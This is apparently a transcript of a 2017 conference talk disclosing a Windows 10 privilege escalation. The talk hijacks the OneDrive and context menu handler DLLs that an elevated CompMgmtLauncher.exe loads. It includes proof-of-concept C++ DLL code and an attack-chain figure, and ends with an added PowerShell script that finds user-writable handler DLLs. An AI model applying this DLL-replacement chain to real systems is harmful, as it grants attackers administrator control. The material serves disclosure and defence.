How to escalate privileges to administrator in latest Windows.

Attackers always hope to get administrator privileges. If they get them, they can do anything. Therefore, they try to get administrator privileges in various ways, such as account stealing, privilege escalation, and UAC bypass. I have found one way to escalate privileges to administrator without using a vulnerability. I hope you will see the demo, understand the mechanism, and prepare against the attacks.

1. How to escalate privileges to administrator in latest Windows. BSides Las Vegas 2017, July 25, 2017, Soya Aoyama
2. Who I am
   • Soya Aoyama
   • Fujitsu System Integration Laboratories Limited
   • First presentation: AVTOKYO 2016
3. Do you want administrator privileges?
   • Steal administrator accounts: Mimikatz, PwDump, CacheDump, …
   • Attack system vulnerabilities: CVE-2017-0156, 0158, 0165, 0166, 0189, 0211, …
   • Use Windows 10 weaknesses: UAC bypass, IFileOperation, …
4. A year ago…
   • I submitted to Microsoft's bounty program. I decided to make it public.
5. I found…
   • CompMgmtLauncher.exe loads a third-party DLL.
   • Requirement: the DLL is registered as a context menu handler under
     HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers
   [Figure: 1. Launch CompMgmtLauncher.exe (a system file) → 2. the process escalates to Administrator → 3. it loads xxx.dll (a third-party program). The problem: third-party code is loaded into the elevated process.]
6. Source Code 1

```cpp
// ...US UnregisterServer;   (the slide starts mid-file; the preceding lines are cut off)
#ifndef UNICODE
#define UNICODE
#endif
#include <windows.h>

// Payload run inside the host process: open a cmd.exe window that echoes the path of
// the process that loaded this DLL (CompMgmtLauncher.exe, elevated) and the path of the DLL.
void MaliciousProcess(WCHAR* dll)
{
    WCHAR exe[MAX_PATH + 1] = { 0 };
    // Two paths plus the command text do not fit in MAX_PATH; size the buffer accordingly.
    WCHAR buf[2 * MAX_PATH + 64] = { 0 };
    GetModuleFileName(NULL, exe, MAX_PATH);               // NULL = the host executable
    wsprintf(buf, L"cmd.exe /k echo %s&echo %s", exe, dll);

    PROCESS_INFORMATION pi = { 0 };
    STARTUPINFO si = { 0 };
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWNORMAL;
    CreateProcess(NULL, buf, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
}

// Standard DLL entry point: the payload fires as soon as the host loads the handler DLL.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        WCHAR self[MAX_PATH + 1] = { 0 };
        GetModuleFileName(hModule, self, MAX_PATH);       // path of this DLL
        MaliciousProcess(self);
    }
    return TRUE;
}
```
7. Demo Video 1
8. During the demonstration…
   • You need administrator privileges to access the file. I found a means to solve this issue.
9. OneDrive helps to solve the problem
   • Explorer loads a OneDrive DLL (FileSyncShell64.dll).
   • The OneDrive program is located under %UserProfile%\AppData\Local\Microsoft\OneDrive, a directory the user can write to.
   • You can use the IFileOperation API in Explorer.
   [Figure: 1. System start launches Explorer.exe (a system file) → 2. Explorer loads FileSyncShell64.dll (the OneDrive program). The problem: code running inside Explorer can access administrator-owned files.]
10. Source Code 2

```cpp
#ifndef UNICODE
#define UNICODE
#endif
#include <windows.h>

// Helpers used by the slide but not shown on it:
DWORD GetIntegrityLevel(HMODULE hModule);   // integrity RID of the current process token
void  ReplaceDll(WCHAR* dll);               // overwrite the handler DLL via IFileOperation from inside Explorer

// The same DLL serves two stages; the integrity level tells it which process loaded it.
void MaliciousProcess(HMODULE hModule, WCHAR* dll)
{
    if (SECURITY_MANDATORY_HIGH_RID > GetIntegrityLevel(hModule)) {
        // Stage 1: loaded by Explorer (medium integrity). Use Explorer's IFileOperation to
        // overwrite the third-party context menu handler, then start the host that elevates.
        ReplaceDll(dll);
        ShellExecute(NULL, NULL, L"CompMgmtLauncher", NULL, NULL, SW_SHOWNORMAL);
    } else {
        // Stage 2: loaded by the elevated CompMgmtLauncher.exe. Prove it with a cmd window
        // (same payload as Source Code 1).
        WCHAR exe[MAX_PATH + 1] = { 0 };
        WCHAR buf[2 * MAX_PATH + 64] = { 0 };            // room for two paths plus the command
        GetModuleFileName(NULL, exe, MAX_PATH);
        wsprintf(buf, L"cmd.exe /k echo %s&echo %s", exe, dll);
        PROCESS_INFORMATION pi = { 0 };
        STARTUPINFO si = { 0 };
        si.cb = sizeof(si);
        si.dwFlags = STARTF_USESHOWWINDOW;
        si.wShowWindow = SW_SHOWNORMAL;
        CreateProcess(NULL, buf, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
    }
}
```
11. Demo Video 2
12. Conclusion
   [Figure: attack chain. Directory: BSidesLV.bat and BSidesLV.dll (malicious program). 1. The user clicks the batch file → 2. it replaces OneDrive's FileSyncShell64.dll with BSidesLV.dll → 3. the system starts (Explorer.exe) → 4. Explorer loads FileSyncShell64.dll → 5. from inside Explorer the DLL replaces WinMerge's ShellExtensionX64.dll → 6. it starts CompMgmtLauncher.exe → 7. CompMgmtLauncher.exe loads ShellExtensionX64.dll as Administrator.]
   Even if the individual weaknesses are small, the combination can be very dangerous.
13. Bad news
   • This was fixed in Build 15063 (Creators Update).
   • CompMgmtLauncher still loads a third-party DLL.
   • CompMgmtLauncher no longer escalates to administrator privileges.
   Microsoft does not want to pay me the reward.
14. Thank you
   https://www.facebook.com/soya.aoyama.3
   @SoyaAoyama
   https://www.slideshare.net/SoyaAoyama
   https://github.com/SoyaAoyama
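Slides 5 and 9 both come down to one condition: a shell extension DLL that Explorer or CompMgmtLauncher.exe will load sits in a location the standard user can write to (the OneDrive DLL under %UserProfile% directly, the third-party handler after the IFileOperation step). The script below is an added defensive check, not code from the talk: it enumerates the context menu handlers registered for `*`, resolves each CLSID to its InprocServer32 DLL and reports the ones the current user could overwrite or plant. The function names `Test-UserWritable` and `Get-ContextMenuHandlerDll` are my own.

```powershell
# Added defensive check, not code from the talk. Run from 64-bit PowerShell so the registry
# view matches the 64-bit Explorer.exe / CompMgmtLauncher.exe that load these handlers.

function Test-UserWritable {
    param([Parameter(Mandatory)][string]$Path)
    # Overwriting the DLL needs WriteData on the file; if the file is missing, the same bit
    # on the directory (CreateFiles) lets an attacker plant it, which is equivalent for the loader.
    $target = if (Test-Path -LiteralPath $Path) { $Path } else { Split-Path -Parent $Path }
    if (-not (Test-Path -LiteralPath $target)) { return $false }

    $id     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $sids   = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    $needed = [System.Security.AccessControl.FileSystemRights]'WriteData, Delete'

    $rules = (Get-Acl -LiteralPath $target).GetAccessRules($true, $true,
                 [System.Security.Principal.SecurityIdentifier])
    foreach ($r in $rules) {
        # Deny rules are ignored: this errs towards false positives, never towards misses.
        if ($r.AccessControlType -ne 'Allow') { continue }
        if ($sids -notcontains $r.IdentityReference.Value) { continue }
        if (($r.FileSystemRights -band $needed) -ne 0) { return $true }
    }
    return $false
}

function Get-ContextMenuHandlerDll {
    # HKCR is the merged view (HKCU\Software\Classes over HKLM\SOFTWARE\Classes) that the shell
    # uses to resolve a CLSID, so per-user registrations such as OneDrive's are included.
    $root = 'Registry::HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers'
    foreach ($key in (Get-ChildItem -LiteralPath $root -ErrorAction SilentlyContinue)) {
        # The subkey is either named after the CLSID or its default value holds the CLSID.
        $clsid = (Get-ItemProperty -LiteralPath $key.PSPath).'(default)'
        if (-not $clsid) { $clsid = $key.PSChildName }
        if ($clsid -notmatch '^\{[0-9A-Fa-f-]{36}\}$') { continue }

        $srv = Get-ItemProperty -LiteralPath "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid\InprocServer32" `
                                -ErrorAction SilentlyContinue
        if (-not $srv -or -not $srv.'(default)') { continue }
        $dll = [Environment]::ExpandEnvironmentVariables($srv.'(default)').Trim('"')

        [pscustomobject]@{
            Handler      = $key.PSChildName
            Clsid        = $clsid
            Dll          = $dll
            UserWritable = Test-UserWritable -Path $dll
        }
    }
}

# Every row here is a DLL that Explorer (and, before the Creators Update, the elevated
# CompMgmtLauncher.exe) will load and that a standard user can swap out.
Get-ContextMenuHandlerDll | Where-Object UserWritable | Format-Table -AutoSize
```

Run it as the standard user you care about, not as an administrator, because the ACL check is evaluated against the caller's own token. A hit under %LocalAppData% is the OneDrive case from slide 9; a hit under Program Files means the handler was installed with loose permissions and needs no IFileOperation trick at all. On builds from 15063 onward CompMgmtLauncher.exe no longer elevates (slide 13), so a writable handler is a persistence and Explorer code-execution finding rather than a direct privilege escalation, but it is still worth fixing.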
